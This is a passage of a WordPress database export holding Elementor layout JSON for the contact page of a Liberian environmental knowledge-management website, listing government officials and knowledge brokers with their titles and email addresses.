href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23116,3342,'_elementor_edit_mode','builder'),(23117,3342,'_elementor_template_type','wp-page'),(23118,3342,'_elementor_version','3.0.16'),(23119,3342,'_wp_page_template','default'),(23120,3342,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a 